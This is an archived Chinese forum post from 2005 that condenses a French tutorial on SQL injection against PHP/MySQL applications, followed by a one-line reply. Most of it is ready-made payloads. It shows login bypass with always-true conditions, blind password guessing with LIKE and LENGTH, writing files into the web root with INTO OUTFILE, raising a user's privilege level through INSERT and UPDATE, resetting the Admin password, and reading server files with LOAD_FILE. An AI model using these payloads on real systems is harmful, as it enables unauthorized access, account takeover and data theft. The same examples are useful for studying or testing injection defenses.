
查看完整版本 : PHP注入几例


Tony
2005-01-13, 11:51 PM
PHP注入，精简版本，小夜整理，有些地方我加了注释。
文章比较细致，主要介绍了三种SQL语句的注入方法。

1- SELECT
2- INSERT
3- UPDATE

$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"


où $search est la variable modifiable par l'utilisateur, venant d'un formulaire POST (ou autre chose) de ce type :


<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

$req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'"

SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.


SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'

SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'

SELECT * FROM table WHERE nom='Jack'# commentaire

SELECT * FROM table WHERE nom='Jack'


SELECT * FROM table WHERE /* commentaires */ addresse='25 rue des roubys'

SELECT * FROM table WHERE addresse='25 rue des roubys'

SELECT uid FROM admins WHERE login='John'#' AND password=''

SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''

$req = "SELECT password FROM admins WHERE login='$login'"

SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.


SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'

http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .

$req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'"

SELECT * FROM table WHERE msg LIKE '%hop'

SELECT * FROM table WHERE msg LIKE 'hop%'

SELECT * FROM table WHERE msg LIKE '%hop%'

SELECT * FROM table WHERE msg LIKE 'h%p'

SELECT * FROM table WHERE msg LIKE 'h_p'


SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''


SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''


$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name"


SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name


$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby"

以上是SELECT的注入，根源都是把用户可控的变量直接拼进SQL字符串。上面提到的我们早已经掌握了，继续看

INSERT :

CREATE TABLE membres (
    -- surrogate key, assigned by the engine
    id INT(10) NOT NULL AUTO_INCREMENT,
    -- 25-char text columns; the INSERT example that follows writes the
    -- submitted $login / $pass values into them as-is
    login VARCHAR(25),
    password VARCHAR(25),
    nom VARCHAR(30),
    email VARCHAR(30),
    -- privilege level; nullable and without a default in this variant
    userlevel TINYINT,
    PRIMARY KEY (id)
)


$query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"


INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')


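-- Same table as above, but userlevel now carries a default. The literal was
-- garbled by HTML-entity mis-decoding in the archive ("&#39;1" read as U+0187);
-- the INSERT template above shows the intended value is '1'.
CREATE TABLE membres (
    -- surrogate key, assigned by the engine
    id INT(10) NOT NULL AUTO_INCREMENT,
    login VARCHAR(25),
    password VARCHAR(25),
    nom VARCHAR(30),
    email VARCHAR(30),
    -- privilege level; the default is what an INSERT ... SET that omits
    -- userlevel ends up with
    userlevel TINYINT DEFAULT '1',
    PRIMARY KEY (id)
)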

$query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"


INSERT INTO membres SET login='',password='',nom='',userlevel='3',email=''


CREATE TABLE membres (
    -- in this variant the primary key is a caller-supplied string rather
    -- than an engine-assigned number (the INSERT below passes $id directly)
    id VARCHAR(15) NOT NULL DEFAULT '',
    login VARCHAR(25),
    password VARCHAR(25),
    nom VARCHAR(30),
    email VARCHAR(30),
    -- privilege level; nullable, no default
    userlevel TINYINT,
    PRIMARY KEY (id)
)


$query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"


INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a','3')#','1')


可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续

UPDATE的利用


CREATE TABLE membres (
    -- surrogate key, assigned by the engine
    id INT(10) NOT NULL AUTO_INCREMENT,
    login VARCHAR(25),
    -- 25-char text column; the UPDATE example that follows writes the
    -- submitted $pass into it unchanged
    password VARCHAR(25),
    nom VARCHAR(30),
    email VARCHAR(30),
    -- privilege level; nullable, no default, and not part of the
    -- UPDATE's SET list below
    userlevel TINYINT,
    PRIMARY KEY (id)
)


$sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"


UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]'


UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'


UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'


UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'


CREATE TABLE news (
    -- surrogate key, assigned by the engine
    idnews INT(10) NOT NULL AUTO_INCREMENT,
    title VARCHAR(50),
    author VARCHAR(20),
    news TEXT,
    -- vote counter and running score; the UPDATE below increments both,
    -- with the score delta taken from the submitted $note
    Votes INT(5),
    score INT(15),
    PRIMARY KEY (idnews)
)


$sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"

UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews='12'

UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews='12'

UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews='12'

la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')


UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews='12'
SELECT CONV("abc",16,3), CONV("abc",16,8).


DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )

UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews='12'

UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews='12'

可爱梦儿
2005-03-11, 01:54 PM
我又学多样野